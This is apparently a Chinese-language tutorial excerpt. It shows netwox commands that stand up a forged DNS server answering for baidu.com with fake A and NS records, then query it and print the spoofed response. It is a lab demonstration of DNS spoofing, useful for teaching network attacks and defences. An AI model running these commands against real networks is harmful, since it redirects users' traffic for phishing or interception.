[email protected]:~# netwox 104 -h baidu.com -H 110.111.112.113 -a 123.baidu.com -A 56.67.78.89
執行命令後將成功偽造域名 baidu.com 的 DNS 伺服器,當有使用者向該伺服器請求域名 baidu.com 對應的 IP 地址時,將會給出偽造的地址。[email protected]:~# netwox 102 -i 192.168.59.133 -n baidu.com -y a
執行命令後,將從偽造的 DNS 伺服器(地址為 192.168.59.133)上獲取對應的 IP 地址、權威伺服器以及對應的 IP 地址資訊。DNS_question_________________________________________________. #DNS請求 | id=29841 rcode=OK opcode=QUERY | | aa=0 tr=0 rd=0 ra=0 quest=1 answer=0 auth=0 add=0 | | baidu.com. A | |__________________________________________________________ | DNS_answer________________________________________________. #DNS響應 | id=29841 rcode=OK opcode=QUERY | | aa=1 tr=0 rd=0 ra=0 quest=1 answer=1 auth=1 add=1 | | baidu.com. A | | baidu.com. A 10 110.111.112.113 | #域名對應的IP地址 | 123.baidu.com. NS 10 123.baidu.com. | #權威伺服器名稱 | 123.baidu.com. A 10 56.67.78.89 | #權威伺服器IP地址 |_____________________________________________________________ |從輸出資訊可以看到,獲取到的域名 baidu.com 對應的 IP 地址為偽造的地址 110.111.112.113,該域名的權威伺服器也是偽造的伺服器 123.baidu.com,對應的 IP 地址為 56.67.78.89。